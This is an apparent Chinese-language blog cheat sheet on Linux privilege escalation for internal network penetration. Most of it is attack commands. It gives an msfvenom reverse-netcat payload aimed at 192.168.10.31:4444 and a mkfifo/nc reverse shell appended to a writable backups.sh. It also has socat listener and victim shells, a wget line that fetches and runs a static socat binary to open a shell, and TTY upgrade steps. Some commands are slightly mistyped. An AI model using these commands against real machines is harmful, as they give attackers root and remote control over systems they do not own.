内网渗透--linux提权

Linux提权思路

内网渗透--linux提权_第1张图片

提权方法

Linux SUID提权

#查找所有者为用户的文件
find / -type f -user 用户名 2>dev/null
#查看带有root权限的SUID命令
find / type  f -perm -u=s 2>/dev/null
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null  

-type d 目录
-type b 块设备文件
-type c 字符设备文件
-type p 管道文件
-type l 符号链接文件
-type f 普通文件

https://gtfobins.github.io/

内核提权

#查看内核信息
uname -a

文件配置不当提权

  • Linux高权限可执行文件提权
#创建bash代码
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.10.31 lport=4444 R
#写入具有高的执行权限的文件
echo " mkfifo /tmp/saqno; nc 192.168.10.31 4444 0/tmp/saqno 2>&1; rm /tmp/saqno " >> backups.sh

linux提权

Linux提权辅助工具

Linux下获取完全交互式TTY

将Python用于伪终端

python -c 'import pty; pty.spawn("/bin/bash")'

使用socat

#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:PORT

#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:IP:PORT
#如果目标没有socat或者没有使用socat的权限
#下载二进制socat 并执行
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:IP:PORT

使用stty

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

# In Kali
#获取终端类型
$echo $TERM
$stty -a
$ stty raw -echo
$ fg

# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>

升级shell

你可能感兴趣的:(Learing)